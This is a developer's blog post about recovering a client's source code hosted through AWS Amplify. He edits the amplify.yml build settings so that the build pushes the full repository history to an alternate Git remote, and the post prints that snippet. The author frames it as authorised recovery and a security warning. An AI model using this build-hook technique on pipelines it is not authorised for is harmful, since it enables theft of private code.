Abílio Azevedo.

The day I recovered the company's source code

Cover Image for The day I recovered the company's source code
Abílio Azevedo
Abílio Azevedo

I wrote this article for the Revelo community. You can access it in portuguese here. English version is below.


This article details the experience of recovering lost source code from a company that was connected to AWS Amplify. By changing the amplify.yml file, it was possible to push the source code to a Git repository during the build process. We will explore how Amplify works, focusing on security aspects and detailing how the source code is exposed at build time.

As developers, we go through some hassles on a daily basis: a company contacted me to do some freelance "small tweaks" service, but they didn't have access to the source code developed by the previous developer 😅. So, would you take on the project? Tell them to start from scratch? Try to recover the source code?


The source code was hosted on GitHub and hosted on AWS through Amplify. We didn't have access to the repository, but we had access to the AWS dashboard.


At some point the code leaves GitHub and goes to AWS to be built and hosted. So we can have access, there is light at the end of the tunnel!

What is AWS Amplify?

AWS Amplify is a set of tools and services that allow developers to build scalable and secure applications in the cloud. It provides an easy-to-use interface to manage backend and frontend resources, including authentication, APIs, storage, and hosting.

You can start using Amplify by setting up a repository for your source code.

Amplify hosting

Notice that you need to authorize AWS Amplify to read your code and write the amplify.yml file which will control the build and deploy process in Amplify and can be customized to meet specific project needs.

Amplify Instalation

Source Code Recovery

As we have seen, the source code is exposed to AWS Amplify so that the build process can be done. In other words, don't go connecting your repository anywhere and any account. In this case, the previous developer who was providing service believed his code was inaccessible. However, we know this is not true.

The build settings are in a yml file and can be modified by the AWS dashboard or by the repository itself, as we can see in the following image:

Amplify Build

As I didn't have access to the repository, I modified this file through the AWS dashboard that the company had access to, and included a step before the build that sent all code to an empty git repository, thus maintaining the entire history of code changes.

version: 1
    - echo 'Enviando código fonte para o repositório Git alternativo'
    - git remote add alternate-repo <URL_DO_REPOSITÓRIO_ALTERNATIVO>
    - git push alternate-repo master

With this we found out that the developer was outsourcing the service to someone else 🤡.

Note: If outsourcing was authorized in the contract, everything is fine. The guy went silent when he found out we were able to access the source code. But that's it folks, pay attention to the possibilities, understand how the tools work and their concepts so you can use them in the best way and get out of hassles like this, always ethically.

That is All Folksundefined

More posts

Cover Image for Factory Health Monitor

Factory Health Monitor

The application is a tool for evaluating the health of various machines in an automobile manufacturing plant. This plant features a range of machines, each with specific data points that you will use to assess the condition of the production process.

Abílio Azevedo
Abílio Azevedo
Cover Image for Upload to AWS S3 using Django, Boto3 and S3Direct

Upload to AWS S3 using Django, Boto3 and S3Direct

Uploading videos via a React Native mobile app to a bucket on the AWS S3 service using S3 Direct and Boto3 with a pre-signed URL.

Abílio Azevedo
Abílio Azevedo


I will send the content posted here. No Spam =)

Experienced Software Engineer with degree in Electrical Engineering with over 8 years of hands-on expertise in building robust and scalable mobile, web and backend applications across various projects mainly in the fintech sector. Mobile (React Native), Web (React and Next.JS) and Backend (Node.JS, PHP and DJANGO). My goal is to create products that add value to people. - © 2024, Abílio Azevedo